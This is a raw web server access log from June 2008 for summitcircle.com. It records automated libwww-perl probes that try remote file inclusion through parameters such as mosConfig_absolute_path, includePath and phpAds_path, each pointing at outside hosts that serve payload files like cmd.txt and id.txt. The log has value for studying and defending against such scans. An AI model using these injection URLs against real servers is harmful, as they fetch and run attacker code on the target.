193.111.11.7 - - [08/Jun/2008:19:46:57 -0700] "GET /logs/access_071231.log//protection.php?action=logout&siteurl=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
193.111.11.7 - - [08/Jun/2008:19:47:04 -0700] "GET //protection.php?action=logout&siteurl=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
193.111.11.7 - - [08/Jun/2008:19:47:10 -0700] "GET /logs//protection.php?action=logout&siteurl=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
216.127.70.91 - - [08/Jun/2008:19:47:22 -0700] "GET /logs/access_071001.log////////?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.127.70.91 - - [08/Jun/2008:19:47:22 -0700] "GET /logs////////?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 200 9529 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.127.70.91 - - [08/Jun/2008:19:47:29 -0700] "GET /logs/access_070924.log////////?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
87.106.101.24 - - [08/Jun/2008:19:47:33 -0700] "GET /logs/show.php?path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.101.24 - - [08/Jun/2008:19:47:33 -0700] "GET /show.php?path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
207.7.108.240 - - [08/Jun/2008:19:48:47 -0700] "GET /logs/show.php?path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
207.7.108.240 - - [08/Jun/2008:19:48:47 -0700] "GET /show.php?path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.86.5.10 - - [08/Jun/2008:19:48:53 -0700] "GET /show.php?path=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
84.234.24.217 - - [08/Jun/2008:19:48:54 -0700] "GET /logs/access_080120.log/view.inc.php?phpAds_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
84.234.24.217 - - [08/Jun/2008:19:48:54 -0700] "GET /view.inc.php?phpAds_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
84.234.24.217 - - [08/Jun/2008:19:48:55 -0700] "GET /logs/view.inc.php?phpAds_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
84.234.24.217 - - [08/Jun/2008:19:50:28 -0700] "GET /logs/index.php?body=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
84.234.24.217 - - [08/Jun/2008:19:50:28 -0700] "GET /index.php?body=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.7.108.203 - - [08/Jun/2008:19:50:58 -0700] "GET /logs/access_070826.log/oneadmin/config.php?path[docroot]=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.32.68.226 - - [08/Jun/2008:19:51:33 -0700] "GET /logs/access_071112.log/claroline/auth/ldap/authldap.php?includePath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.32.68.226 - - [08/Jun/2008:19:51:33 -0700] "GET /claroline/auth/ldap/authldap.php?includePath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.32.68.226 - - [08/Jun/2008:19:51:33 -0700] "GET /logs/claroline/auth/ldap/authldap.php?includePath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
84.234.24.217 - - [08/Jun/2008:19:51:56 -0700] "GET /logs/access.log/scanhttp://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
84.234.24.217 - - [08/Jun/2008:19:51:56 -0700] "GET /scanhttp://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
84.234.24.217 - - [08/Jun/2008:19:51:56 -0700] "GET /logs/scanhttp://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.7.108.203 - - [08/Jun/2008:19:52:19 -0700] "GET /logs/access_071022.log/oneadmin/config.php?path[docroot]=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com" 189.129.32.1